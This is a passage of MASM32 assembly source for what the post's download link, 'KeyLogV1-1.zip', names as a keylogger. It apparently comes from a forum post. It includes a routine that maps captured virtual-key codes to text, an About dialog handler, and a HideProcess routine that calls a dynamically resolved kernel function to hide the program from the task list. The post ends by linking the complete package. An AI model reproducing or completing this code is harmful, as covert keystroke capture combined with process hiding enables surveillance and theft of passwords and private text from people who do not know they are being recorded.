;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_LEFT INVOKE lstrcpy, addr_buffer, ADDR k_left MOV len_string, 6 .ELSEIF EAX == VK_UP INVOKE lstrcpy, addr_buffer, ADDR k_up MOV len_string, 4 .ELSEIF EAX == VK_RIGHT INVOKE lstrcpy, addr_buffer, ADDR k_right MOV len_string, 7 .ELSEIF EAX == VK_DOWN INVOKE lstrcpy, addr_buffer, ADDR k_down MOV len_string, 6 .ELSEIF EAX == VK_NUMPAD0 INVOKE lstrcpy, addr_buffer, ADDR k_numpad0 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD1 INVOKE lstrcpy, addr_buffer, ADDR k_numpad1 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD2 INVOKE lstrcpy, addr_buffer, ADDR k_numpad2 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD3 INVOKE lstrcpy, addr_buffer, ADDR k_numpad3 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD4 INVOKE lstrcpy, addr_buffer, ADDR k_numpad4 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD5 INVOKE lstrcpy, addr_buffer, ADDR k_numpad5 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD6 INVOKE lstrcpy, addr_buffer, ADDR k_numpad6 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD7 INVOKE lstrcpy, addr_buffer, ADDR k_numpad7 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD8 INVOKE lstrcpy, addr_buffer, ADDR k_numpad8 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD9 INVOKE lstrcpy, addr_buffer, ADDR k_numpad9 MOV len_string, 10 .ELSEIF EAX == VK_DIVIDE || EAX == 0BFh MOV AL, '/' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_MULTIPLY MOV AL, '*' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_SUBTRACT || EAX == 0BDh MOV AL, '-' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_ADD MOV AL, '+' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_DECIMAL || EAX == 0BEh MOV AL, '.' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0C0h MOV AL, '`' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BAh MOV AL, ';' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BBh MOV AL, '=' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BCh MOV AL, ',' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DBh MOV AL, '[' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DCh || EAX == 0E2h MOV AL, '\' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DDh MOV AL, ']' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DEh MOV AL, 27h MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSE INVOKE lstrcpy, addr_buffer, ADDR k_unknown MOV len_string, 9 .ENDIF MOV EAX, len_string RETTranslateVirtualKeyCode ENDP;*******************************************************************************************************************;*******************************************************************************************************************dlgabout PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .IF uMsg==WM_INITDIALOG INVOKE MessageBeep, NULL INVOKE GetDlgItem, hDlg, IDC_BUTTON3 INVOKE SetFocus, EAX .ELSEIF uMsg == WM_CLOSE INVOKE EndDialog, hDlg, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON3 INVOKE SendMessage, hDlg, WM_CLOSE, NULL, NULL .ENDIF .ELSE MOV EAX, FALSE RET .ENDIF MOV EAX, TRUE RETdlgabout ENDP;*******************************************************************************************************************;This function will try to hide this program from the task list. If successful, return 0; else;returns -1 (0FFFFFFFFh).;*******************************************************************************************************************HideProcess PROC LOCAL h_kernel:DWORD, addr_function:DWORD, return_val:DWORD INVOKE GetModuleHandle, ADDR kernel_name MOV h_kernel, EAX INVOKE GetProcAddress, h_kernel, ADDR kernel_function MOV addr_function, EAX .IF EAX == NULL MOV return_val, -1 .ELSE PUSH 1 PUSH 0 CALL EAX AND return_val, 0 .ENDIF MOV EAX, return_val RETHideProcess ENDP;*******************************************************************************************************************END startDownload (complet):http://win32assembly.online.fr/files/KeyLogV1-1.zip Quote
